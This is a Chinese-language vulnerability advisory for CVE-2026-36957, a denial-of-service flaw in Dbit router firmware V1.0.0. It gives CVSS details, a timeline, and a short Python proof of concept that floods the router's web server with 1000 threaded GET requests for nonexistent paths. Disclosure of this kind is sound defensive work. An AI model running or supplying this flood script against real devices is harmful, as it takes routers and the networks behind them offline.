CVE ID: CVE-2026-36957 日期: 2026-04-29 发现者: Kirubel Solomne 厂商: 深圳市迪比特网络设备有限公司 产品: Dbit 路由器 固件版本: V1.0.0 CWE: CWE-400 - 未受控的资源消耗
Dbit 路由器固件 V1.0.0 存在通过 Boa Web 服务器 URI 处理器导致的拒绝服务漏洞。攻击者向不存在的 URI 发送大量 HTTP GET 请求洪泛,可耗尽关键系统资源(包括文件描述符和内存缓冲区)。这会导致内核死锁或系统挂起,从而禁用 Web 管理门户及所有路由功能。
CVSS v3.1 评分:7.5(高危)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| 指标 | 值 |
|---|---|
| 攻击向量 | 网络 |
| 攻击复杂度 | 低 |
| 所需权限 | 无 |
| 用户交互 | 无 |
| 机密性影响 | 无 |
| 完整性影响 | 无 |
| 可用性影响 | 高 |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router is still responsive.")
预期行为: 服务器应限制连接并保持稳定。 实际行为: 路由器 Web 界面无响应;需要手动重启。
| 日期 | 事件 |
|---|---|
| 2026-04-29 | 发现漏洞 |
| 2026-04-29 | 上报至 MITRE |
| 2026-04-29 | 分配 CVE-2026-36957 |
| 2026-04-29 | 公开披露 |